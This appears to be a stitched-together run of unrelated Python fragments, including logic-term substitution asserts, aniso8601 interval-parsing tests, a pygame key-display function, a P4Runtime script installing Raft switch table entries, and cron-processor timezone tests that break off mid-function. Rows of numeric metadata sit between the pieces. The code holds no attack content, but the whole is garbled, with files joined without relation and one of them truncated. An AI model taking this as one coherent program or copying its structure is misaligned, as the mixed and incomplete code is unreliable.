assert Nu(SVar("x"), EVar("x")).substitute(EVar("x"), EVar("v")) == Nu(SVar("x"), EVar("v"))
assert Nu(SVar("x"), SVar("x")).substitute(EVar("x"), EVar("v")) == Nu(SVar("x"), SVar("x"))
assert Nu(SVar("y"), SVar("x")).substitute(EVar("x"), EVar("v")) == Nu(SVar("y"), SVar("x"))
assert Nu(SVar("y"), EVar("x")).substitute(EVar("x"), EVar("v")) == Nu(SVar("y"), EVar("v"))
assert Nu(SVar("x"), EVar("x")).substitute(SVar("x"), EVar("v")) == Nu(SVar("x"), EVar("x"))
assert Nu(SVar("x"), SVar("x")).substitute(SVar("x"), EVar("v")) == Nu(SVar("x"), SVar("x"))
assert Nu(SVar("y"), EVar("x")).substitute(SVar("x"), EVar("v")) == Nu(SVar("y"), EVar("x"))
assert Nu(SVar("y"), SVar("x")).substitute(SVar("x"), EVar("v")) == Nu(SVar("y"), EVar("v"))
assert And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e"))).substitute(SVar("a"), SVar("x")) \
== And(Or(SVar("x"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e")))
assert And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e"))).substitute(SVar("b"), SVar("x")) \
== And(Or(SVar("a"), SVar("x")), App(App(Symbol("c"), SVar("d")), SVar("e")))
assert And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e"))).substitute(SVar("c"), SVar("x")) \
== And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e")))
assert And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e"))).substitute(SVar("d"), SVar("x")) \
== And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("x")), SVar("e")))
assert And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e"))).substitute(SVar("e"), SVar("x")) \
== And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("x")))
| 69.614458
| 120
| 0.533576
| 902
| 5,778
| 3.39357
| 0.034368
| 0.14211
| 0.070565
| 0.058804
| 0.968638
| 0.954917
| 0.944463
| 0.886638
| 0.807579
| 0.583469
| 0
| 0
| 0.119072
| 5,778
| 82
| 121
| 70.463415
| 0.601375
| 0
| 0
| 0
| 0
| 0
| 0.053479
| 0
| 0
| 0
| 0
| 0
| 0.875
| 1
| 0.03125
| true
| 0
| 0.015625
| 0
| 0.046875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7797b51a1442ab9ecd51671b370f7d51e7fcaa27
| 6,080
|
py
|
Python
|
aniso8601/tests/test_interval.py
|
3stack-software/python-aniso8601-relativedelta
|
99a42e5e57fa16879325dc151bd811b478ca31b9
|
[
"BSD-3-Clause"
] | null | null | null |
aniso8601/tests/test_interval.py
|
3stack-software/python-aniso8601-relativedelta
|
99a42e5e57fa16879325dc151bd811b478ca31b9
|
[
"BSD-3-Clause"
] | null | null | null |
aniso8601/tests/test_interval.py
|
3stack-software/python-aniso8601-relativedelta
|
99a42e5e57fa16879325dc151bd811b478ca31b9
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
import unittest
import datetime
from aniso8601.interval import parse_interval, parse_repeating_interval
class TestIntervalFunctions(unittest.TestCase):
def test_parse_interval(self):
resultinterval = parse_interval('P1M/1981-04-05T01:01:00')
self.assertEqual(resultinterval[0], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=3, day=6, hour=1, minute=1))
resultinterval = parse_interval('P1M/1981-04-05')
self.assertEqual(resultinterval[0], datetime.date(year=1981, month=4, day=5))
self.assertEqual(resultinterval[1], datetime.date(year=1981, month=3, day=6))
resultinterval = parse_interval('PT1H/2014-11-12')
self.assertEqual(resultinterval[0], datetime.date(year=2014, month=11, day=12))
self.assertEqual(resultinterval[1], datetime.datetime(year=2014, month=11, day=11, hour=23))
resultinterval = parse_interval('PT4H54M6.5S/2014-11-12')
self.assertEqual(resultinterval[0], datetime.date(year=2014, month=11, day=12))
self.assertEqual(resultinterval[1], datetime.datetime(year=2014, month=11, day=11, hour=19, minute=5, second=53, microsecond=500000))
resultinterval = parse_interval('1981-04-05T01:01:00/P1M1DT1M')
self.assertEqual(resultinterval[0], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=5, day=6, hour=1, minute=2))
resultinterval = parse_interval('1981-04-05/P1M1D')
self.assertEqual(resultinterval[0], datetime.date(year=1981, month=4, day=5))
self.assertEqual(resultinterval[1], datetime.date(year=1981, month=5, day=6))
resultinterval = parse_interval('2014-11-12/PT1H')
self.assertEqual(resultinterval[0], datetime.date(year=2014, month=11, day=12))
self.assertEqual(resultinterval[1], datetime.datetime(year=2014, month=11, day=12, hour=1, minute=0))
resultinterval = parse_interval('2014-11-12/PT4H54M6.5S')
self.assertEqual(resultinterval[0], datetime.date(year=2014, month=11, day=12))
self.assertEqual(resultinterval[1], datetime.datetime(year=2014, month=11, day=12, hour=4, minute=54, second=6, microsecond=500000))
resultinterval = parse_interval('1980-03-05T01:01:00/1981-04-05T01:01:00')
self.assertEqual(resultinterval[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
resultinterval = parse_interval('1980-03-05T01:01:00/1981-04-05')
self.assertEqual(resultinterval[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
self.assertEqual(resultinterval[1], datetime.date(year=1981, month=4, day=5))
resultinterval = parse_interval('1980-03-05/1981-04-05T01:01:00')
self.assertEqual(resultinterval[0], datetime.date(year=1980, month=3, day=5))
self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
resultinterval = parse_interval('1980-03-05/1981-04-05')
self.assertEqual(resultinterval[0], datetime.date(year=1980, month=3, day=5))
self.assertEqual(resultinterval[1], datetime.date(year=1981, month=4, day=5))
resultinterval = parse_interval('1981-04-05/1980-03-05')
self.assertEqual(resultinterval[0], datetime.date(year=1981, month=4, day=5))
self.assertEqual(resultinterval[1], datetime.date(year=1980, month=3, day=5))
resultinterval = parse_interval('1980-03-05T01:01:00--1981-04-05T01:01:00', intervaldelimiter='--')
self.assertEqual(resultinterval[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
resultinterval = parse_interval('1980-03-05 01:01:00/1981-04-05 01:01:00', datetimedelimiter=' ')
self.assertEqual(resultinterval[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
def test_parse_repeating_interval(self):
results = list(parse_repeating_interval('R3/1981-04-05/P1D'))
self.assertEqual(results[0], datetime.date(year=1981, month=4, day=5))
self.assertEqual(results[1], datetime.date(year=1981, month=4, day=6))
self.assertEqual(results[2], datetime.date(year=1981, month=4, day=7))
results = list(parse_repeating_interval('R11/PT1H2M/1980-03-05T01:01:00'))
for dateindex in range(0, 11):
self.assertEqual(results[dateindex], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1) - dateindex * datetime.timedelta(hours=1, minutes=2))
results = list(parse_repeating_interval('R2--1980-03-05T01:01:00--1981-04-05T01:01:00', intervaldelimiter='--'))
self.assertEqual(results[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
self.assertEqual(results[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
results = list(parse_repeating_interval('R2/1980-03-05 01:01:00/1981-04-05 01:01:00', datetimedelimiter=' '))
self.assertEqual(results[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
self.assertEqual(results[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
resultgenerator = parse_repeating_interval('R/PT1H2M/1980-03-05T01:01:00')
for dateindex in range(0, 11):
self.assertEqual(next(resultgenerator), datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1) - dateindex * datetime.timedelta(hours=1, minutes=2))
| 61.414141
| 169
| 0.700329
| 861
| 6,080
| 4.907085
| 0.114983
| 0.138462
| 0.205917
| 0.048284
| 0.865089
| 0.815621
| 0.776331
| 0.760237
| 0.730888
| 0.730888
| 0
| 0.139177
| 0.144408
| 6,080
| 98
| 170
| 62.040816
| 0.67301
| 0.032072
| 0
| 0.402985
| 0
| 0.044776
| 0.092208
| 0.064308
| 0
| 0
| 0
| 0
| 0.58209
| 1
| 0.029851
| false
| 0
| 0.044776
| 0
| 0.089552
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
77a64f6d50d9f7f3592c7085e13586c2d0037414
| 130
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_radio.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_radio.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_radio.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.parts.jumbo.calculators.calc_radio import CALC_Radio_jumbo
class CALC_Radio_nixi(CALC_Radio_jumbo):
pass
| 21.666667
| 77
| 0.846154
| 19
| 130
| 5.421053
| 0.578947
| 0.349515
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 130
| 6
| 78
| 21.666667
| 0.880342
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
77f1f4fa1de5fac1dff8a5247f62f9d65a936f6b
| 105
|
py
|
Python
|
gala/potential/setup_package.py
|
segasai/gala
|
8d6f3557894231d975c287a2b8560d09a4789513
|
[
"MIT"
] | null | null | null |
gala/potential/setup_package.py
|
segasai/gala
|
8d6f3557894231d975c287a2b8560d09a4789513
|
[
"MIT"
] | null | null | null |
gala/potential/setup_package.py
|
segasai/gala
|
8d6f3557894231d975c287a2b8560d09a4789513
|
[
"MIT"
] | 1
|
2018-10-23T23:20:20.000Z
|
2018-10-23T23:20:20.000Z
|
def get_package_data():
return {'gala.potential': ['src/funcdefs.h', 'potential/src/cpotential.h']}
| 26.25
| 79
| 0.695238
| 14
| 105
| 5.071429
| 0.785714
| 0.338028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104762
| 105
| 3
| 80
| 35
| 0.755319
| 0
| 0
| 0
| 0
| 0
| 0.519231
| 0.25
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
77fa19ec4c1f8048df85d81b2e2cbc1f7f72516b
| 109
|
py
|
Python
|
ipython/startup/import_shutil.py
|
dycw/dotfiles2
|
9e23c4989e9813080da3658a8f98dbb1e03776f2
|
[
"MIT"
] | null | null | null |
ipython/startup/import_shutil.py
|
dycw/dotfiles2
|
9e23c4989e9813080da3658a8f98dbb1e03776f2
|
[
"MIT"
] | null | null | null |
ipython/startup/import_shutil.py
|
dycw/dotfiles2
|
9e23c4989e9813080da3658a8f98dbb1e03776f2
|
[
"MIT"
] | null | null | null |
import shutil # noqa: F401
from shutil import copyfile # noqa: F401
from shutil import which # noqa: F401
| 27.25
| 41
| 0.743119
| 16
| 109
| 5.0625
| 0.4375
| 0.296296
| 0.296296
| 0.444444
| 0.592593
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 0.201835
| 109
| 3
| 42
| 36.333333
| 0.827586
| 0.293578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7ad7c97c6ce0cade9c17c1f86de0089776efc95b
| 2,784
|
py
|
Python
|
getKey.py
|
UcanYusuf/ArrowGui
|
5c55cb1bd7c8e9dedf45d620fcd01d2f3ed0109e
|
[
"MIT"
] | null | null | null |
getKey.py
|
UcanYusuf/ArrowGui
|
5c55cb1bd7c8e9dedf45d620fcd01d2f3ed0109e
|
[
"MIT"
] | null | null | null |
getKey.py
|
UcanYusuf/ArrowGui
|
5c55cb1bd7c8e9dedf45d620fcd01d2f3ed0109e
|
[
"MIT"
] | null | null | null |
import pygame
import sys
#pygame.init()
#win = pygame.display.set_mode((400, 140))
#font = pygame.font.SysFont('Arial', 50)
def getKey(win, font, keyInput):
if keyInput[119]: # W
pygame.draw.rect(win, [220, 30, 30], pygame.Rect(70, 5, 60, 60))
win.blit(font.render('W', True, (0, 0, 0)), (80, 10))
else:
pygame.draw.rect(win, [255, 100, 0], pygame.Rect(70, 5, 60, 60))
win.blit(font.render('W', True, (0, 0, 0)), (80, 10))
if keyInput[97]: # A
pygame.draw.rect(win, [220, 30, 30], pygame.Rect(5, 70, 60, 60))
win.blit(font.render('A', True, (0, 0, 0)), (20, 70))
else:
pygame.draw.rect(win, [255, 100, 0], pygame.Rect(5, 70, 60, 60))
win.blit(font.render('A', True, (0, 0, 0)), (20, 70))
if keyInput[115]: # S
pygame.draw.rect(win, [220, 30, 30], pygame.Rect(70, 70, 60, 60))
win.blit(font.render('S', True, (0, 0, 0)), (85, 70))
else:
pygame.draw.rect(win, [255, 100, 0], pygame.Rect(70, 70, 60, 60))
win.blit(font.render('S', True, (0, 0, 0)), (85, 70))
if keyInput[100]: # D
pygame.draw.rect(win, [220, 30, 30], pygame.Rect(135, 70, 60, 60))
win.blit(font.render('D', True, (0, 0, 0)), (150, 70))
else:
pygame.draw.rect(win, [255, 100, 0], pygame.Rect(135, 70, 60, 60))
win.blit(font.render('D', True, (0, 0, 0)), (150, 70))
if keyInput[1073741906]: # UP
pygame.draw.rect(win, [220, 30, 30], pygame.Rect(270, 5, 60, 60))
win.blit(font.render('▲', True, (0, 0, 0)), (282, 5))
else:
pygame.draw.rect(win, [255, 100, 0], pygame.Rect(270, 5, 60, 60))
win.blit(font.render('▲', True, (0, 0, 0)), (282, 5))
if keyInput[1073741904]: # LEFT
pygame.draw.rect(win, [220, 30, 30], pygame.Rect(205, 70, 60, 60))
win.blit(font.render('◄', True, (0, 0, 0)), (208, 73))
else:
pygame.draw.rect(win, [255, 100, 0], pygame.Rect(205, 70, 60, 60))
win.blit(font.render('◄', True, (0, 0, 0)), (208, 73))
if keyInput[1073741905]: # DOWN
pygame.draw.rect(win, [220, 30, 30], pygame.Rect(270, 70, 60, 60))
win.blit(font.render('▼', True, (0, 0, 0)), (282, 73))
else:
pygame.draw.rect(win, [255, 100, 0], pygame.Rect(270, 70, 60, 60))
win.blit(font.render('▼', True, (0, 0, 0)), (282, 73))
if keyInput[1073741903]: # RIGHT
pygame.draw.rect(win, [220, 30, 30], pygame.Rect(335, 70, 60, 60))
win.blit(font.render('►', True, (0, 0, 0)), (350, 73))
else:
pygame.draw.rect(win, [255, 100, 0], pygame.Rect(335, 70, 60, 60))
win.blit(font.render('►', True, (0, 0, 0)), (350, 73))
pygame.display.update()
| 41.552239
| 75
| 0.52227
| 451
| 2,784
| 3.239468
| 0.144124
| 0.043806
| 0.15332
| 0.186174
| 0.807666
| 0.807666
| 0.807666
| 0.807666
| 0.807666
| 0.741958
| 0
| 0.203659
| 0.253951
| 2,784
| 66
| 76
| 42.181818
| 0.495908
| 0.043103
| 0
| 0.461538
| 0
| 0
| 0.006185
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019231
| false
| 0
| 0.038462
| 0
| 0.057692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7af3206b4e72fb1b43e5d5ec83eb9c6b86f05cc6
| 2,791
|
py
|
Python
|
P4Runtime_test.py
|
EmanueleGallone/P4Raft
|
7c943cca6f1c3d29c82fae56cdc66951c32310c6
|
[
"Apache-2.0"
] | null | null | null |
P4Runtime_test.py
|
EmanueleGallone/P4Raft
|
7c943cca6f1c3d29c82fae56cdc66951c32310c6
|
[
"Apache-2.0"
] | null | null | null |
P4Runtime_test.py
|
EmanueleGallone/P4Raft
|
7c943cca6f1c3d29c82fae56cdc66951c32310c6
|
[
"Apache-2.0"
] | null | null | null |
# ALREADY DONE IN s1-runtime.json
# INTENDED AS AN EXAMPLE FOR FUTURE DEVELOPMENT
#!/usr/bin/env python2
import grpc
import os, sys
from time import sleep
# Import P4Runtime lib from parent utils dir
# Probably there's a better way of doing this.
sys.path.append(
os.path.join(os.path.dirname(os.path.abspath(__file__)),
'utils/p4runtime_lib'))
import bmv2
from error_utils import printGrpcError
from switch import ShutdownAllSwitchConnections
import helper
p4info_file_path = "build/Raft.p4.p4info.txt"
p4info_helper = helper.P4InfoHelper(p4info_file_path)
s1 = bmv2.Bmv2SwitchConnection(
name='s1',
address='127.0.0.1:50051',
device_id=0,
proto_dump_file='logs/s1-p4runtime-requests_my_py.txt')
s1.MasterArbitrationUpdate()
table_entry2 = p4info_helper.buildTableEntry(
table_name="MyIngress.follower",
match_fields={
"meta.raft_metadata.role": 0,
"hdr.raft.messageType": 10,
"hdr.ipv4.dstAddr": [0x0, 0xa, 1]
},
action_name="MyIngress.follower_timeout",
action_params={}
)
s1.WriteTableEntry(table_entry2)
print("Installed leader table entry rule on {}".format(s1.name))
def install_s1__entry_rule(): # DO NOT USE
# ALREADY DONE IN s1-runtime.json
# INTENDED AS AN EXAMPLE FOR FUTURE DEVELOPMENT
#!/usr/bin/env python2
import grpc
import os
from time import sleep
# Import P4Runtime lib from parent utils dir
# Probably there's a better way of doing this.
sys.path.append(
os.path.join(os.path.dirname(os.path.abspath(__file__)),
'utils/p4runtime_lib'))
import bmv2
from error_utils import printGrpcError
from switch import ShutdownAllSwitchConnections
import helper
p4info_file_path = "build/Raft.p4.p4info.txt"
p4info_helper = helper.P4InfoHelper(p4info_file_path)
s1 = bmv2.Bmv2SwitchConnection(
name='s1',
address='127.0.0.1:50051',
device_id=0,
proto_dump_file='logs/s1-p4runtime-requests_my_py.txt')
s1.MasterArbitrationUpdate()
table_entry = p4info_helper.buildTableEntry(
table_name="MyIngress.leader",
match_fields={
"meta.raft_metadata.role": 2,
"hdr.raft.messageType": 2
},
action_name="MyIngress.spread_new_request",
action_params={}
)
table_entry2 = p4info_helper.buildTableEntry(
table_name="MyIngress.follower",
match_fields={
"meta.raft_metadata.role": 0,
"hdr.raft.messageType": 10,
"hdr.ipv4.dstAddr": ["10.0.1.254", 32]
},
action_name="MyIngress.follower_timeout",
action_params={}
)
s1.WriteTableEntry(table_entry)
s1.WriteTableEntry(table_entry2)
print("Installed leader table entry rule on {}".format(s1.name))
| 28.773196
| 68
| 0.691508
| 359
| 2,791
| 5.197772
| 0.309192
| 0.019293
| 0.030011
| 0.051447
| 0.929796
| 0.929796
| 0.889068
| 0.889068
| 0.889068
| 0.889068
| 0
| 0.043088
| 0.20172
| 2,791
| 97
| 68
| 28.773196
| 0.794434
| 0.137585
| 0
| 0.760563
| 0
| 0
| 0.239149
| 0.11227
| 0
| 0
| 0.002504
| 0
| 0
| 1
| 0.014085
| false
| 0
| 0.197183
| 0
| 0.211268
| 0.056338
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24e15dc3b700adabacfe7490b331e3ae9a23f5d5
| 113
|
py
|
Python
|
PedicleScrewPlanner/PedicleScrewPlannerWizard/__init__.py
|
lassoan/PedicleScrewSimulator
|
7bf04fc00695115ac64742e692849a15e430f9dc
|
[
"MIT"
] | 4
|
2018-10-25T03:39:33.000Z
|
2021-09-16T02:56:59.000Z
|
PedicleScrewPlanner/PedicleScrewPlannerWizard/__init__.py
|
jumbojing/PedicleScrewSimulator
|
cbb84cd84cd5617693f5ff29593bc396ecb1cb8a
|
[
"MIT"
] | 6
|
2019-06-06T12:41:25.000Z
|
2021-06-11T02:29:17.000Z
|
PedicleScrewPlanner/PedicleScrewPlannerWizard/__init__.py
|
lassoan/PedicleScrewSimulator
|
7bf04fc00695115ac64742e692849a15e430f9dc
|
[
"MIT"
] | 8
|
2019-06-06T11:16:23.000Z
|
2021-08-03T02:13:30.000Z
|
from .PlanningMeasurementsStep import *
from .PlanningLandmarksStep import *
from .PlanningGradeStep import *
| 28.25
| 40
| 0.814159
| 9
| 113
| 10.222222
| 0.555556
| 0.217391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132743
| 113
| 3
| 41
| 37.666667
| 0.938776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
703d79ff89a3b6a1caf72e00379c7eae24ce4bac
| 135
|
py
|
Python
|
chariot/transformer/generator/__init__.py
|
Y-Kuro-u/chariot
|
032f3eecdd55b30c65351e1e636c939c4b20919e
|
[
"Apache-2.0"
] | 134
|
2018-06-11T01:40:14.000Z
|
2021-11-15T12:34:38.000Z
|
chariot/transformer/generator/__init__.py
|
Y-Kuro-u/chariot
|
032f3eecdd55b30c65351e1e636c939c4b20919e
|
[
"Apache-2.0"
] | 10
|
2018-06-17T10:45:50.000Z
|
2021-04-05T05:51:11.000Z
|
chariot/transformer/generator/__init__.py
|
Y-Kuro-u/chariot
|
032f3eecdd55b30c65351e1e636c939c4b20919e
|
[
"Apache-2.0"
] | 8
|
2019-02-23T06:43:21.000Z
|
2021-02-18T06:05:11.000Z
|
from .target_generator import ShiftedTarget
from .target_generator import ShuffledTarget
from .source_generator import ShuffledSource
| 27
| 44
| 0.881481
| 15
| 135
| 7.733333
| 0.533333
| 0.387931
| 0.327586
| 0.431034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096296
| 135
| 4
| 45
| 33.75
| 0.95082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
704ec43dae7713b46a929e86eb0e8efd8ee56434
| 11,811
|
py
|
Python
|
routemaster/tests/test_cron_processors.py
|
thread/routemaster
|
1fd997a3bcee5e6760e9f7a60cb54323c3dfdc41
|
[
"MIT"
] | 13
|
2018-01-16T14:26:27.000Z
|
2022-03-19T12:43:17.000Z
|
routemaster/tests/test_cron_processors.py
|
thread/routemaster
|
1fd997a3bcee5e6760e9f7a60cb54323c3dfdc41
|
[
"MIT"
] | 86
|
2018-01-03T17:00:56.000Z
|
2021-12-06T12:58:06.000Z
|
routemaster/tests/test_cron_processors.py
|
thread/routemaster
|
1fd997a3bcee5e6760e9f7a60cb54323c3dfdc41
|
[
"MIT"
] | 3
|
2018-02-21T23:13:45.000Z
|
2022-03-19T12:43:23.000Z
|
import datetime
import contextlib
from unittest import mock
import freezegun
import dateutil.tz
from routemaster.config import (
TimezoneAwareTrigger,
MetadataTimezoneAwareTrigger,
)
from routemaster.state_machine import labels_in_state_with_metadata
from routemaster.cron_processors import (
TimezoneAwareProcessor,
MetadataTimezoneAwareProcessor,
)
UTC = dateutil.tz.gettz('UTC')
@contextlib.contextmanager
def mock_cron_processors_functools_partial():
with mock.patch(
'routemaster.cron_processors.functools',
autospec=True,
) as mock_functools:
yield mock_functools.partial
def recently() -> datetime.datetime:
"""
Helper for getting a time shortly before now. This is mostly expected to be
used for the construction of cron processors, so that their construction
time is separate to (and earlier than) the current time when they're run
but otherwise very close (to avoid changing the semantics of the test).
"""
return datetime.datetime.now(UTC) - datetime.timedelta(microseconds=1)
# Test TimezoneAwareProcessor
def test_timezone_aware_processor_repr() -> None:
mock_callable = mock.Mock()
trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
processor = TimezoneAwareProcessor(mock_callable, trigger)
assert 'Etc/UTC' in repr(processor)
assert '12:00' in repr(processor)
@freezegun.freeze_time('2019-08-01 12:00 UTC')
def test_timezone_aware_processor_runs_on_time() -> None:
mock_callable = mock.Mock()
trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
with freezegun.freeze_time(recently()):
processor = TimezoneAwareProcessor(mock_callable, trigger)
processor()
mock_callable.assert_called_once_with()
@freezegun.freeze_time('2019-08-01 12:00 UTC')
def test_timezone_aware_processor_runs_on_time_other_timezone() -> None:
mock_callable = mock.Mock()
trigger = TimezoneAwareTrigger(datetime.time(13, 0), 'Europe/London')
with freezegun.freeze_time(recently()):
processor = TimezoneAwareProcessor(mock_callable, trigger)
processor()
mock_callable.assert_called_once_with()
@freezegun.freeze_time('2019-08-01 12:00 UTC')
def test_timezone_aware_processor_doesnt_run_when_timezone_doesnt_match() -> None:
mock_callable = mock.Mock()
trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Europe/London')
with freezegun.freeze_time(recently()):
processor = TimezoneAwareProcessor(mock_callable, trigger)
processor()
mock_callable.assert_not_called()
@freezegun.freeze_time('2019-08-01 15:00 UTC')
def test_timezone_aware_processor_doesnt_run_at_wrong_time() -> None:
mock_callable = mock.Mock()
trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
with freezegun.freeze_time(recently()):
processor = TimezoneAwareProcessor(mock_callable, trigger)
processor()
mock_callable.assert_not_called()
@freezegun.freeze_time('2019-08-01 15:00 UTC')
def test_timezone_aware_processor_runs_if_delayed_since_construction() -> None:
mock_callable = mock.Mock()
trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
with freezegun.freeze_time('2019-08-01 11:00 UTC'):
processor = TimezoneAwareProcessor(mock_callable, trigger)
processor()
mock_callable.assert_called_once_with()
@freezegun.freeze_time('2019-08-01 15:00 UTC')
def test_timezone_aware_processor_runs_if_delayed_since_last_run() -> None:
mock_callable = mock.Mock()
trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
with freezegun.freeze_time('2019-08-01 01:00 UTC'):
processor = TimezoneAwareProcessor(mock_callable, trigger)
with freezegun.freeze_time('2019-08-01 11:00 UTC'):
processor()
mock_callable.assert_not_called() # not yet
processor()
mock_callable.assert_called_once_with()
def test_timezone_aware_processor_doesnt_run_multiple_times() -> None:
mock_callable = mock.Mock()
trigger = TimezoneAwareTrigger(datetime.time(12, 0), 'Etc/UTC')
